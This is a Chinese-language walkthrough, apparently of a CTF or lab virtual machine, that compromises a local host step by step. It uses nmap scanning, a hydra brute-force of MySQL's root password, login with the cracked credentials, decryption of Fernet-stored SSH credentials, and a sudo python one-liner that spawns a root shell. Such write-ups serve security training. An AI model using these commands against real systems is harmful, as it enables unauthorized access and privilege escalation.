1. 侦查
1.1 收集目标网络信息:IP地址
1.2 主动扫描:扫描IP地址段
1.3 主动扫描:漏洞扫描
2. 初始访问
2.1 有效账户:本地账户
3. 权限提升
3.1 滥用特权控制机制:Sudo或Sudo缓存
1.1 收集目标网络信息:IP地址
设置成NAT模式:
登录之后自动显示出IP为192.168.230.17
1.2 主动扫描:扫描IP地址段
nmap 192.168.230.17 -n -Pn -p- --reason -sV
-n: 不进行DNS解析,直接使用IP地址进行扫描。
-Pn: 假设目标主机是活动的,不进行ping扫描。
-p-: 扫描所有65535个端口。
--reason: 显示每个状态判断的原因(例如,SYN-ACK响应)。
-sV: 进行服务版本检测,尝试确定开放端口上运行的服务及其版本。
发现1337/SSH、3306/MySQL漏洞
1.3 主动扫描:漏洞扫描
用hydra爆破MySQL服务的root用户的弱口令:
hydra -l root -P /home/kali/Desktop/test/dic0.txt 192.168.230.17 mysql
爆破出MySQL的root/prettywoman
2.1 有效账户:本地账户
利用刚才爆出来的MySQL的root/preetywoman来登录MySQL服务
mysql -h 192.168.230.17 -uroot -pprettywoman --skip-ssl
可看出有个data数据库,其他三个是MySQL默认的数据库
查看data数据库的字段内容:
gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=
UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=
根据表名fernet提示,猜测应该是fernet加密,尝试随波逐流解密:
lucy:wJ9`"Lemdv9[FEw-
用户名确认是lucy,密码是wJ9`"Lemdv9[FEw-
根据先前的1337/SSH,尝试ssh连接:
ssh lucy@192.168.230.17 -p 1337
whoami;id;hostname;ip address
现在还是uid=1000(lucy) gid=1000(lucy) groups=1000(lucy),无root权限
3.1 滥用特权控制机制:Sudo或Sudo缓存
sudo -l列出用户的权限或检查特定命令:
发现能在root权限且无密码的情况下运行/usr/bin/python2 /opt/exp.py
python命令能用于提权
sudo python -c 'import os; os.system("/bin/sh")'
import os; os.system("/bin/sh"); os.setuid(0)
成功sudo提权!
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
